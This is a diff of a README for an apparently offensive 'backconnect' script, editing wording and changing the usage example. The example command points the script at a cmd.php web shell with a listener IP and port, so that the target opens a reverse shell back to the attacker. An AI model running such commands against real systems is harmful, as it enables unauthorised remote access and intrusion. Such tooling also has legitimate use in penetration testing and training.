mt-code/backconnect/README.md

 This is the URL of the command execution shell, including the necessary injection parameter.

 ##### IP
-This is the listener IP for the remote server to backconnect to.
+This is the listener IP for the remote server to back-connect to.

 ##### PORT
-This is the listener port for the target server to backconnect over.
+This is the listener port for the target server to back-connect over.

 #### Example:
 ```
-./eof-backconnect.py -u http://example.com/cmd.php?cmd= -i 10.10.15.96 -p 1337
+./backconnect.py -u http://localhost/cmd.php?cmd= -i 127.0.0.1 -p 1337
 ```

 ## Disclaimer